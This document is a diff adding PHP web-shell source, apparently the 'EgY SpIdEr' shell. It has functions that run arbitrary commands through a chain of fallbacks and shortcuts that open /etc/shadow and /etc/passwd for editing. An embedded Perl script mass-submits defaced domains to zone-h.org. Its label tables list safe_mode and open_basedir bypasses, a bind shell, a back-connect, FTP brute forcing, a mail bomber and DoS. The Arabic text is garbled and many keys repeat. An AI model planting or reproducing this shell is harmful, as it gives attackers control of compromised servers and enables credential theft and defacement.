+@site = <a>;
+close(a);
+\$b = scalar(@site);
+for(\$a=0;\$a<=\$b;\$a++)
+{chomp \$site[\$a];
+if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
+print \"[+] Sending \$site[\$a]\n\";
+use IO::Socket::INET;
+\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
+print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
+print \$sock \"Accept: */*\r\n\";
+print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
+print \$sock \"Accept-Language: pt-br\r\n\";
+print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
+print \$sock \"Connection: Keep-Alive\r\n\";
+print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
+print \$sock \"Host: old.zone-h.org\r\n\";
+print \$sock \"Content-Length: 385\r\n\";
+print \$sock \"Pragma: no-cache\r\n\";
+print \$sock \"\r\n\";
+print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
+close(\$sock);}");
+if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
+}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "[ Can't complete the operation !! ]";}
+else {callfuncs("chmod 777 $zpl;chmod 777 $li");
+ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
+print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
+}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
+print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
+www.site1.com
+www.site2.com
+</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
+input ("submit","zonesub","Send","");print $ef;die();}
+print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+function inisaf($iniv) { $chkini=ini_get($iniv);
+if(($chkini || strtolower($chkini)) !=='on'){print"<font color=olive><b>OFF ( Not secured )</b></font>";} else{
+print"<font color=red><b>ON ( Secured )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
+if ($chkin==""){print " <font color=red><b>None</b></font>";}
+else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=olive>".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
+elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
+while (!feof($opop)){ $nval= fgetc($opop);}}
+elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
+ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
+if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
+else{print"<font color=olive><b>OFF</b></font>";} }
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
+
+
+
+
+ if(isset($_GET['egy']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
+  <font face="tahoma" size="-2"><b>
+  <p align="center">&nbsp;</p>
+  <p align="center">
+  <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
+<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/about.htm"></IFRAME></font></p>
+  <p align="center">&nbsp;</p>
+  <div id="n" align="center">
+    &nbsp;</div>
+  <p>&nbsp;</font></b></div>
+</b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+  if(isset($_GET['news']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
+  <font face="tahoma" size="-2"><b>
+  <p align="center">&nbsp;</p>
+  <p align="center">
+  <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
+<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/news.htm"></IFRAME></font></p>
+  <p align="center">&nbsp;</p>
+  <div id="n" align="center">
+    &nbsp;</div>
+  <p>&nbsp;</font></b></div>
+</b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+
+
+
+
+if(isset($_GET['5']))
+ {$_POST['cmd'] = 'systeminfo';}
+if(isset($_GET['6']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
+if(isset($_GET['7']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
+if(isset($_GET['8']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
+if(isset($_GET['9']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
+if(isset($_GET['10']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
+if(isset($_GET['13']))
+ {$_POST['cmd']='cat /proc/cpuinfo';}
+if(isset($_GET['14']))
+ {$_POST['cmd']='cat /proc/version';}
+if(isset($_GET['15']))
+ {$_POST['cmd'] = 'free';}
+if(isset($_GET['16']))
+ {$_POST['cmd'] = 'dmesg(8)';}
+if(isset($_GET['17']))
+ {$_POST['cmd'] = 'vmstat';}
+if(isset($_GET['18']))
+ {$_POST['cmd'] = 'lspci';}
+if(isset($_GET['19']))
+ {$_POST['cmd'] = 'lsdev';}
+if(isset($_GET['20']))
+ {$_POST['cmd']='cat /proc/interrupts';}
+if(isset($_GET['21']))
+ {$_POST['cmd'] = 'cat /etc/*realise';}
+if(isset($_GET['22']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
+if(isset($_GET['23']))
+ {$_POST['cmd'] = 'lsattr -va';}
+if(isset($_GET['24']))
+ {$_POST['cmd'] = 'w';}
+if(isset($_GET['25']))
+ {$_POST['cmd'] = 'who';}
+if(isset($_GET['26']))
+ {$_POST['cmd'] = 'uptime';}
+if(isset($_GET['27']))
+ {$_POST['cmd'] = 'last -n 10';}
+if(isset($_GET['28']))
+ {$_POST['cmd'] = 'ps -aux';}
+if(isset($_GET['29']))
+ {$_POST['cmd'] = 'service --status-all';}
+if(isset($_GET['30']))
+ {$_POST['cmd'] = 'ifconfig';}
+if(isset($_GET['31']))
+ {$_POST['cmd'] = 'netstat -a';}
+if(isset($_GET['32']))
+ {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
+if(isset($_GET['33']))
+ {$_POST['cmd'] = 'fdisk -l';}
+if(isset($_GET['34']))
+ {$_POST['cmd'] = 'df -h';}
+
+
+#if(isset($_GET['']))
+# {$_POST['cmd'] = '';}
+
+
+$lang=array(
+'ar_text1' =>'ÇáÇãÑ ÇáãäİĞ',
+'ar_text2' =>'ÊäİíĞ ÇáÇæÇãÑ İí ÇáÓíÑİÑ',
+'ar_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'ar_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑİÑ',
+'ar_text5' =>'ÑİÚ ãáİ Çáì ÇáÓíÑİÑ',
+'ar_text6' =>'ãÓÇÑ ãáİß',
+'ar_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'ar_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'ar_butt1' =>'ÊäİíĞ',
+'ar_butt2' =>'ÑİÜÚ',
+'ar_text9' =>'İÊÍ ÈæÑÊ İí ÇáÓíÑİÑ Úáì /bin/bash',
+'ar_text10'=>'ÈÜæÑÊ',
+'ar_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'ar_butt3' =>'İÊÍ',
+'ar_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'ar_text13'=>'ÇáÇí Èí',
+'ar_text14'=>'ÇáãäİĞ',
+'ar_butt4' =>'ÃÊÜÕÇá',
+'ar_text15'=>'ÓÍÈ ãáİÇÊ Çáì ÇáÓíÑİÑ',
+'ar_text16'=>'Úä ØÑíŞ',
+'ar_text17'=>'ÑÇÈØ Çáãáİ',
+'ar_text18'=>'ãßÇä äÒæáå',
+'ar_text19'=>'Exploits',
+'ar_text20'=>'ÅÓÊÎÏã',
+'ar_text21'=>'ÇáÇÓã ÇáÌÏíÏ',
+'ar_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'ar_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'ar_text24'=>'ÇáÓíÑİÑ ÇáÈÚíÏ',
+'ar_text25'=>'ÇáãäİĞ ÇáÈÚíÏ',
+'ar_text26'=>'ÇÓÊÎÏã',
+'ar_butt5' =>'ÊÔÛíá',
+'ar_text28'=>'ÇáÚãá İí ÇáæÖÚ ÇáÇãä',
+'ar_text29'=>'ããäæÚ ÇáÏÎæá',
+'ar_butt6' =>'ÊÛíÑ',
+'ar_text30'=>'ÚÑÖ ãáİ',
+'ar_butt7' =>'ÚÑÖ',
+'ar_text31'=>'Çáãáİ ÛíÑ ãæÌæÏ',
+'ar_text32'=>'ÊäİíĞ ßæÏ php Úä ØÑíŞ ÏÇáå eval',
+'ar_text33'=>'Test bypass open_basedir with cURL functions',
+'ar_butt8' =>'ÇÎÊÈÇÑ',
+'ar_text34'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå include',
+'ar_text35'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå Mysql',
+'ar_text36'=>'ÇáŞÇÚÏÉ . ÇáÌÏæá',
+'ar_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'ar_text38'=>'ßáãÉ ÇáãÑæÑ',
+'ar_text39'=>'ÇáŞÇÚÏÉ',
+'ar_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáŞÇÚÏÉ',
+'ar_butt9' =>'äÓÎÉ',
+'ar_text41'=>'ÍİÙ ÇáäÓÎÉ İí',
+'ar_text42'=>'ÊÚÏíá ÇáãáİÇÊ',
+'ar_text43'=>'Çáãáİ ÇáãÑÇÏ ÊÚÏíáå',
+'ar_butt10'=>'ÍİÙ',
+'ar_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åĞÇ Çáãáİ İŞØ ÊŞÑÃ',
+'ar_text45'=>'Êã ÇáÍİÙ',
+'ar_text46'=>'ÚÑÖ phpinfo()',
+'ar_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ İí php.ini',
+'ar_text48'=>'ãÓÍ ãáİÇÊ ÇáÜ temp',
+'ar_butt11'=>'ÊÍÑíÑ Çáãáİ',
+'ar_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑİÑ',
+'ar_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ ÇáÑÆíÓíÉ',
+'ar_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ',
+'ar_text52'=>'ÈÍË äÕ',
+'ar_text53'=>'İí ÇáãÓÇÑ',
+'ar_text54'=>'ÈÍË Úä äÕ İí ÇáãáİÇÊ',
+'ar_butt12'=>'ÈÍË',
+'ar_text55'=>'İŞØ İí ÇáãáİÇÊ',
+'ar_text56'=>'áÇíæÌÏ :(',
+'ar_text57'=>'ÇäÔÇÁ/ãÓÍ ãáİ/ãÌáÏ',
+'ar_text58'=>'ÇáÇÓã',
+'ar_text59'=>'ãáİ',
+'ar_text60'=>'ãÌáÏ',
+'ar_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'ar_text61'=>'Êã ÅäÔÇÁ Çáãáİ',
+'ar_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'ar_text63'=>'Êã ãÓÍ Çáãáİ',
+'ar_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'ar_butt65'=>'ÅäÔÇÁ',
+'ar_text66'=>'ãÓÍ',
+'ar_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'ar_text68'=>'ÇãÑ',
+'ar_text69'=>'ÅÓã Çáãáİ',
+'ar_text70'=>'ÇáÊÕÑíÍ',
+'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'ar_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'ar_text73'=>'ÈÍË İí ÇáãÌáÏÇÊ',
+'ar_text74'=>'ÈÍË İí ÇáãáİÇÊ',
+'ar_text75'=>'* you can use regexp',
+'ar_text76'=>'ÇáÈÍË Úä äÕ İí ãáİÇÊ ÈæÇÓØå find',
+'ar_text80'=>'ÇáäæÚ',
+'ar_text81'=>'ÇáÅÊÕÇáÇÊ',
+'ar_text82'=>'ŞæÇÚÏ ÇáÈíÇäÇÊ',
+'ar_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'ar_text84'=>'ÇÓÊÚáÇã ŞÇÚÏÉ',
+'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'ar_text86'=>'ÊäÒíá ãáİÇÊ ãä ÇáÓíÑİÑ',
+'ar_butt14'=>'ÊÍãíá',
+'ar_text87'=>'ÊäÒíá ãáİÇÊ ãä ÎÇÏã ÇáÇİ Êí Èí',
+'ar_text88'=>'ÓíÑİÑ ÇáÇİ Êí Èí:ÇáãäİĞ',
+'ar_text89'=>'ãáİ İí ÇáÇİ Êí Èí',
+'ar_text90'=>'ÇáÊÍæíá Çáì',
+'ar_text91'=>'ÇÑÔİÉ',
+'ar_text92'=>'ãä ÛíÑ ÇáÇÑÔİÉ',
+'ar_text93'=>'ÇáÇİ Êí Èí',
+'ar_text94'=>'ÊÎãíä ÇáÇİ Êí Èí',
+'ar_text95'=>'ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'ar_text96'=>'áã íÓÊØÚ ÓÍÈ ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'ar_text97'=>'Êã ÇáİÍÕ: ',
+'ar_text98'=>'Êã ÈäÌÇÍ: ',
+'ar_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä İí ãáİ /etc/passwd áÏÎæá ááÜ ftp',
+'ar_text100'=>'ÇÑÓÇá ãáİ Çáì ÎÇÏã ÇáÇİ Êí Èí',
+'ar_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'ar_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'ar_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'ar_text104'=>'ÇÑÓÇá ãáİ Çáì ÇáÇíãíá',
+'ar_text105'=>'Åáì',
+'ar_text106'=>'ãÜä',
+'ar_text107'=>'ÇáãæÖæÚ',
+'ar_butt15'=>'ÅÑÓÇá',
+'ar_text108'=>'ÇáÑÓÇáÉ',
+'ar_text109'=>'ãÎİí',
+'ar_text110'=>'ÚÑÖ',
+'ar_text111'=>'ÓíÑİÑ ŞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäİĞ',
+'ar_text112'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ ÏÇáå mb_send_mail',
+'ar_text113'=>'ŞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíŞ via imap_list',
+'ar_text114'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ via imap_body',
+'ar_text115'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ compress.zlib://',
+'ar_text116'=>'äÓÎ ãä',
+'ar_text117'=>'Çáì',
+'ar_text118'=>'Êã äÓÎ Çáãáİ',
+'ar_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'ar_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åĞÇ Çáãáİ ',
+'ar_err1'=>'ÎØÇÁ ! ÛíÑ ŞÇÏÑ Úáì ŞÑÇÆå åĞÇ Çáãáİ ',
+'ar_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'ar_err3'=>'ÎØÇÁ! ÛíÑ ŞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇİ Êí Èí',
+'ar_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑİÑ ÇáÇİ Êí Èí',
+'ar_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ İí ÇáÇİ Êí Èí',
+'ar_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'ar_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'ar_text200'=>'copy()ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ',
+'ar_text202'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+'ar_text300'=>'curl()ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ',
+'ar_text203'=>'ini_restore()ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ',
+'ar_text204'=>'error_log()ÒÑÇÚå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå',
+'ar_text205'=>'ÃÒÑÚ ÇáÔá Úáì åĞÇ ÇáãÓÇÑ',
+'ar_text206'=>'ŞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏ',
+'ar_text207'=>'ŞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíŞ ËÛÑå reg_glob',
+'ar_text208'=>'ÊäİíĞ ÇáÇæÇãÑ İí ÇáæÖÚ ÇáÇãä Úä ØÑíŞ ÇáÏæÇá',
+'ar_text209'=>'ŞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíŞ ËÛÑå root',
+'ar_text210'=>'İß ÊÔİíÑ ÇáÒäÏ ',
+'ar_text211'=>'::ÇŞİÇá ÇáÓíİ ãæÏ::',
+'ar_text212'=>'php.ini ÇŞİÇá ÇáÓíİ ãæÏ Úä ØÑíŞ ÒÑÚ ãáİ',
+'ar_text213'=>'htacces ÅŞİÇá ÇáãæÏ ÓßíæÑÊí Úä ØÑíŞ ÒÑÚ ãáİ',
+'ar_text214'=>'ÃÓã ÇáÇÏãä',
+'ar_text215'=>'ÚäæÇä ÇáÓíÑİÑ IRC ',
+'ar_text216'=>'# ÃÓã ÇáÛÑİå ãÚ',
+'ar_text217'=>'ÇÓã ÇáÓíÑİÑ ÇáãÎÊÑŞ',
+'ar_text218'=>'áÅíŞÇİ ÇáÓíİ ãæÏ ini_restore ÒÑÚ ãáİ íÍÊæí Úáì ËÛÑå',
+'ar_text219'=>'ÓÍÈ ãáİÇÊ Çáì ÇáÓíÑİÑ æÊÛíÑ ÇÓãåÇ ÈÇáæÖÚ ÇáÇãä',
+'ar_text220'=>'ÇÓÊÚÑÇÖ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå symlink ÇáÎØæå ÇáÇæáì',
+'ar_text221'=>'ÖÛØ ÇáãáİÇÊ áÊÍãíáåÇ ãä ÇáãæŞÚ(ÈÚÏ ÊÍãíáåÇ áÌåÇÒß ÛíÑ ÇãÊÏÇÏ Çáãáİ áÇãÊÏÇÏå ÇáÓÇÈŞ)1',
+'ar_text222'=>'ÇÓÊÚÑÇÖ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå symlink ÇáÎØæå ÇáËÇäíå',
+'ar_text223'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ÇáÏæÇá',
+'ar_text224'=>'PLUGIN ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑå ',
+'ar_text143'=>'ÇáÊãÈ: ',
+'ar_text65'=>'ÇäÔÇÁ',
+
+
+
+
+'ar_text33'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'ar_text34'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  include function',
+'ar_text35'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  load file in mysql',
+'ar_text85'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  commands execute via MSSQL server',
+'ar_text112'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'ar_text113'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'ar_text114'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'ar_text115'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'ar_text116'=>'Copy from',
+'ar_text117'=>'to',
+'ar_text118'=>'File copied',
+'ar_text119'=>'Cant copy file',
+'ar_text120'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'ar_text121'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'ar_text122'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'ar_text123'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'ar_text124'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'ar_text126'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'ar_text127'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'ar_text128'=>'Modify/Access file (touch)',
+'ar_text129'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'ar_text130'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'ar_text131'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'ar_text132'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'ar_text133'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'ar_err3'=>'Error! Can\'t connect to ftp',
+'ar_err4'=>'Error! Can\'t login on ftp server',
+'ar_err5'=>'Error! Can\'t change dir on ftp',
+'ar_err6'=>'Error! Can\'t sent mail',
+'ar_err7'=>'Mail send',
+'ar_text1' =>'Executed command',
+'ar_text2' =>'Execute command on server',
+'ar_text33'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'ar_text34'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  include function',
+'ar_text35'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  load file in mysql',
+'ar_text112'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'ar_text113'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'ar_text114'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'ar_text115'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'ar_text120'=>'ÊÎØì ÇáÓíİ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'ar_text121'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'ar_text122'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'ar_text123'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'ar_text124'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'ar_text126'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'ar_text127'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'ar_text128'=>'Modify/Access file (touch)',
+'ar_text129'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'ar_text130'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'ar_text131'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'ar_text132'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'ar_text133'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'ar_text142'=>'Downloaders',
+'ar_text137'=>'Useful',
+'ar_text128'=>'Modify/Access file (touch)',
+'ar_text129'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'ar_text130'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'ar_text131'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'ar_text132'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'ar_text133'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'ar_text134'=>'Database-bruteforce',
+'ar_text135'=>'Dictionary',
+'ar_text136'=>'Creating evil symlink',
+'ar_text137'=>'Useful',
+'ar_text138'=>'Dangerous',
+'ar_text139'=>'Mail Bomber',
+'ar_text140'=>'DoS',
+'ar_text141'=>'Danger! Web-daemon crash possible.',
+'ar_text142'=>'Downloaders',
+'ar_text143'=>'Temp: ',
+'ar_text144'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ  load file in mysqli',
+'ar_text145'=>'ÊÎØì ÇáÓíİ ãæÏ È open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'ar_text146'=>'Max Interation',
+'ar_text147'=>'',
+'ar_text148'=>'',
+'ar_text149'=>'',
+'ar_text150'=>'',
+'ar_err0'=>'Error! Can\'t write in file ',
+'ar_err1'=>'Error! Can\'t read file ',
+'ar_err2'=>'Error! Can\'t create ',
+'ar_err3'=>'Error! Can\'t connect to ftp',
+'ar_err4'=>'Error! Can\'t login on ftp server',
+'ar_err5'=>'Error! Can\'t change dir on ftp',
+'ar_err6'=>'Error! Can\'t sent mail',
+'ar_err7'=>'Mail send',
+'ar_text125'=>'Data',
